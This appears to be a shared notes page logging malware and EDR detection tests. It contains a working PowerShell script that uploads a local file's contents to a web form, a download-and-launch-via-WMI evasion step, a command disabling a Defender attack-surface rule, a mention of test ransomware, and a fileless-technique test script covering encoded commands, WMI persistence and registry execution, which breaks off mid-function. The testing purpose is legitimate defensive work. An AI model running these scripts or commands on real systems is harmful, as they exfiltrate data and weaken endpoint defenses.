Skip to content
Malware Test Share
Malware 1
This was just powershell malware:
Save as script.ps1
$FilePath = "C:\Users\Alok\Test\supersecretdata.txt"
$FormURL = ""
$EntryID = "entry.1527296737"
$Data = Get-Content -Path $FilePath -Raw
$EncodedData = [System.Net.WebUtility]::UrlEncode($Data)
$PostParams = @{
$EntryID = $EncodedData
"fvv" = "1"
"fbzx" = "5359892683187229793"
"pageHistory" = "0"
}
$Response = Invoke-WebRequest -Uri $FormURL -Method Post -Body $PostParams -UseBasicParsing
Write-Output "Response Status Code: $($Response.StatusCode)"
Write-Output "Response Content: $($Response.Content)"
powershell -ExecutionPolicy Bypass -File .\script.ps1
Malware Test 2
This is a known piece of test malware:
Download
Invoke-WebRequest -Uri "" -OutFile "C:\Users\User\Desktop\test.exe"
Try to bypass by loading the process via WMI
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "bad.exe"
Malware Test 3
This is Tiago's bespoke malware which they did not block or detect.
Compiled to only run from and encrypt files in C:\Users\User\Downloads\surpriseeeee\surpriseeeee
He's probably not running the C2, so exfil will fail but it should encrypt any files in that folder. Doesn't change file extension.
baibai2.zip
138.2 kB
alok.zip
138.5 kB
surpriseeeee.zip
2.7 MB
Alok’s EDR Tests
Archive.zip
13.7 kB
powershell Set-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Disabled
EDR Testing.ps1
12.3 kB
<#
.SYNOPSIS
Fileless Malware Detection Test Script for EDR Solutions
.DESCRIPTION
This script simulates fileless malware techniques to test EDR detection capabilities
IMPORTANT: Run only in controlled test environments with proper authorization.
.NOTES
Author: [Your Name]
Version: 1.0
Filename: FilelessMalwareTest.ps1
#>
# Script configuration
$TestingLocation = "$PWD\Fileless Malware"
$LogFile = "$TestingLocation\fileless_test_log.txt"
# Ensure testing directory exists
function Initialize-TestEnvironment {
if (-not (Test-Path $TestingLocation)) {
New-Item -ItemType Directory -Path $TestingLocation | Out-Null
}
"Fileless Malware Detection Testing Started: $(Get-Date)" | Out-File -FilePath $LogFile
"----------------------------------------" | Out-File -FilePath $LogFile -Append
}
# Log function
function Write-TestLog {
param (
[string]$TestName,
[string]$TestDescription,
[string]$Result
)
"Test: $TestName" | Out-File -FilePath $LogFile -Append
"Description: $TestDescription" | Out-File -FilePath $LogFile -Append
"Result: $Result" | Out-File -FilePath $LogFile -Append
"----------------------------------------" | Out-File -FilePath $LogFile -Append
}
# Test 1: Memory-Only PowerShell Script Execution
function Test-MemoryOnlyExecution {
$TestName = "Memory-Only PowerShell Execution"
$TestDescription = "Executes PowerShell script directly in memory without touching disk"
try {
# Create a harmless PowerShell script to run in memory
$scriptBlock = {
$proc = Get-Process
$sysInfo = Get-ComputerInfo
$env = Get-ChildItem Env:
$outputString = "Memory-Only Execution Test Completed Successfully"
return $outputString
}
# Convert to encoded command (simulates fileless technique of obfuscation)
$encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($scriptBlock.ToString()))
# Execute the script in memory
$result = powershell.exe -EncodedCommand $encodedCommand
Write-TestLog -TestName $TestName -TestDescription $TestDescription -Result "Completed: $result"
}
catch {
Write-TestLog -TestName $TestName -TestDescription $TestDescription -Result "Failed: $_"
}
}
# Test 2: PowerShell Reflective Loading
function Test-ReflectiveLoading {
$TestName = "PowerShell Reflective Loading"
$TestDescription = "Uses .NET reflection to load and execute code in memory"
try {
# Create a PowerShell script that uses reflection to load an assembly
$reflectionScript = {
# Create a simple C# class in memory
$csharpCode = @'
using System;
using System.Diagnostics;
public class FilelessTest
{
public static string RunTest()
{
Process[] processes = Process.GetProcesses();
int count = processes.Length;
return "Reflective Loading Test: Found " + count + " running processes";
}
}
'@
# Load the C# code into memory using reflection
Add-Type -TypeDefinition $csharpCode -Language CSharp
# Execute the loaded code
[FilelessTest]::RunTest()
}
# Execute the reflection script
$result = Invoke-Command -ScriptBlock $reflectionScript
Write-TestLog -TestName $TestName -TestDescription $TestDescription -Result "Completed: $result"
}
catch {
Write-TestLog -TestName $TestName -TestDescription $TestDescription -Result "Failed: $_"
}
}
# Test 3: WMI Persistence Test
function Test-WMIPersistence {
$TestName = "WMI Persistence"
$TestDescription = "Tests creating a WMI event subscription (common fileless persistence technique)"
try {
# Name for our test event filter and consumer
$eventFilterName = "EDRTest_Filter_$(Get-Random)"
$eventConsumerName = "EDRTest_Consumer_$(Get-Random)"
# Create a temporary VBS script for the WMI consumer action - just writes to our log file
$vbsContent = @"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile("$PWD\wmi_triggered.txt", 8, True)
objFile.WriteLine "WMI Event triggered at " & Now()
objFile.Close
"@
$vbsPath = "$PWD\temp_wmi_action.vbs"
$vbsContent | Out-File -FilePath $vbsPath -Force
# Create the WMI event filter (trigger)
$filterQuery = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Second = 0"
$filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{
Name = $eventFilterName
EventNamespace = 'root\cimv2'
QueryLanguage = 'WQL'
Query = $filterQuery
}
# Create the WMI event consumer (action)
$consumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{
Name = $eventConsumerName
ScriptingEngine = 'VBScript'
ScriptText = $vbsContent
}
# Bind them together
$binding = Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{
Filter = $filter
Consumer = $consumer
}
# Sleep a bit to ensure WMI registration
Start-Sleep -Seconds 2
# Clean up - remove the binding, filter, and consumer so we don't leave junk behind
$binding | Remove-WmiObject -ErrorAction SilentlyContinue
$filter | Remove-WmiObject -ErrorAction SilentlyContinue
$consumer | Remove-WmiObject -ErrorAction SilentlyContinue
# Remove the temporary VBS file
if (Test-Path $vbsPath) {
Remove-Item -Path $vbsPath -Force
}
Write-TestLog -TestName $TestName -TestDescription $TestDescription -Result "WMI persistence test completed"
}
catch {
Write-TestLog -TestName $TestName -TestDescription $TestDescription -Result "Failed: $_"
}
}
# Test 4: Registry-based Script Execution (Fileless Technique)
function Test-RegistryExecution {
$TestName = "Registry-based Script Execution"
$TestDescription = "Stores and executes a script from the registry without touching disk"
try {
# Registry location for our test
$regPath = "HKCU:\Software\EDRTest"
# Create the registry key if it doesn't exist
if (-not (Test-Path $regPath)) {
New-Item -Path $regPath -Force | Out-Null
}
# Create a simple PowerShell script to store in the registry
$testScript = @"
Write-Host "This is a test script executed from registry"
Get-Date | Out-File "$TestingLocation\registry_exec_test.txt"
"@
# Store the script in the registry
Set-ItemProperty -Path $regPath -Name "ScriptTest" -Value $testScript -Type String
# Read the script from registry and execute it via PowerShell
$regScript = Get-ItemProperty -Path $regPath -Name "ScriptTest" | Select-Object -ExpandProperty ScriptTest
$encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($regScript))
powershell.exe -EncodedCommand $encodedCommand
# Clean up registry key
Remove-Item -Path $regPath -Force -Recurse
Want to print your doc?
This is not the way.
This is not the way.
Try clicking the ⋯ next to your doc name or using a keyboard shortcut (
CtrlP
) instead.